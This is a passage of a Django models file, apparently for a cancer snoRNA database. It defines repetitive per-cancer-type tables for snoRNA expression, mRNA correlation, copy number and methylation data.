chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
# protein_expression
class protein_expression(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
protein = models.CharField(max_length= 225, null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# gene snorna pair
class gene_snorna_pair(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length=225)
def __str__(self):
return self.snorna
# split whole table as cancer type
# for snorna_expression
class snorna_expression_ACC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_BLCA(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_BRCA(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_CESC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_CHOL(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_COAD(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_DLBC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_ESCA(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_HNSC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_KICH(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_KIRC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_KIRP(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_LGG(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_LIHC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_LUAD(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_LUSC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_MESO(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_OV(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_PAAD(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_PCPG(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_PRAD(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_READ(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_SARC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_SKCM(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_STAD(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_TGCT(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_THCA(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_THYM(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_UCEC(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_UCS(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class snorna_expression_UVM(models.Model):
snorna = models.CharField(max_length=225, null = True)
dataset_id = models.CharField(max_length=225, null = True)
sample_id = models.CharField(max_length=225, null=True)
snorna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# for mrna expression
class mrna_expression_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
class mrna_expression_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
gene_symbol = models.CharField(max_length= 225, null=True)
host = models.IntegerField(null=True)
spearman_corr = models.FloatField(null=True)
p_value = models.FloatField(null=True)
fdr = models.FloatField(null=True)
sample_id = models.CharField(max_length=225, null=True)
rna_expression = models.FloatField(null=True)
def __str__(self):
return self.snorna
# for cnv
class cnv_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_CHOL(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_COAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_DLBC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_ESCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_HNSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_KICH(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_KIRC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_KIRP(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_LGG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_LIHC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_LUAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_LUSC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_MESO(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_OV(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_PAAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_PCPG(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_PRAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_READ(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_SARC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_SKCM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_STAD(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_TGCT(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_THCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_THYM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_UCEC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_UCS(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
class cnv_UVM(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
copy = models.FloatField(null=True)
def __str__(self):
return self.snorna
# methylation
class methylation_ACC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_BLCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_BRCA(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
start = models.IntegerField(null=True)
end = models.IntegerField(null=True)
source = models.CharField(max_length=45, null=True)
distance = models.IntegerField(null=True)
meth_id = models.CharField(max_length=225, null=True)
pos = models.IntegerField(null=True)
level = models.FloatField(null=True)
def __str__(self):
return self.snorna
class methylation_CESC(models.Model):
snorna = models.CharField(max_length=225, null=True)
dataset_id = models.CharField(max_length=225, null=True)
sample_id = models.CharField(max_length=225, null=True)
chrom = models.CharField(max_length=10, null=True)
strand = models.CharField(max_length=4, null=True)
